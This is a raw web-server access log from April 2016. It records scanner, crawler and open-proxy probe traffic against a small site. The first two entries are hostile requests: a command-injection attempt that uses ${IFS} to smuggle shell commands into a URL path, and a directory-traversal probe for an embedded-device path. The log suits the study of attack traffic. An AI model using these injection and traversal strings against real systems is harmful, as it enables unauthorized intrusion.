213.131.6.189 - - [22/Apr/2016:21:25:23 +0200] "GET /language/Swedish$%7BIFS%7D&&echo$%7BIFS%7DgUrn%3EEhZw&&tar$%7BIFS%7D/string.js HTTP/1.1" 404 388 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7"
213.131.6.189 - - [22/Apr/2016:21:25:28 +0200] "GET /../../../../../../../mnt/mtd/EhZw HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/9.0.1 Safari/601.2.7"
213.131.6.189 - - [22/Apr/2016:21:25:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
199.115.117.88 - - [22/Apr/2016:21:52:07 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:07 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:07 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:07 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:07 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:07 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:08 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:08 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:08 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
199.115.117.88 - - [22/Apr/2016:21:52:08 +0200] "GET /recordings/theme/iefixes.css HTTP/1.1" 404 333 "-" "python-requests/2.8.0"
61.228.90.14 - - [22/Apr/2016:22:23:07 +0200] "CONNECT 163mx03.mxmail.netease.com:25 HTTP/1.0" 405 355 "-" "-"
84.228.35.156 - - [22/Apr/2016:22:35:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
84.228.35.156 - - [22/Apr/2016:22:35:58 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
84.228.35.156 - - [22/Apr/2016:22:36:02 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
84.228.35.156 - - [22/Apr/2016:22:38:28 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
84.228.35.156 - - [22/Apr/2016:22:39:06 +0200] "GET / HTTP/1.0" 200 1229 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"
115.231.222.14 - - [22/Apr/2016:23:28:30 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.9677340378065549 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
115.231.222.14 - - [22/Apr/2016:23:28:30 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.4097478776494348 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
141.212.122.161 - - [22/Apr/2016:23:31:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Go http package"
5.206.88.106 - - [23/Apr/2016:00:30:44 +0200] "GET http://env.darkbyte.ru/?UABV9lvU HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"
162.243.220.220 - - [23/Apr/2016:00:33:07 +0200] "GET /robots.txt HTTP/1.1" 404 323 "-" "Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )"
162.243.220.220 - - [23/Apr/2016:00:33:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )"
5.206.88.106 - - [23/Apr/2016:01:21:40 +0200] "GET http://env.darkbyte.ru/?UABZ9lvU HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36"
61.228.92.185 - - [23/Apr/2016:01:30:54 +0200] "CONNECT vip163mx01.mxmail.netease.com:25 HTTP/1.0" 405 358 "-" "-"
115.231.222.14 - - [23/Apr/2016:01:39:30 +0200] "GET http://zc.qq.com/cgi-bin/common/attr?id=260714&r=0.1280796873849973 HTTP/1.1" 404 320 "-" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; 360SE)"
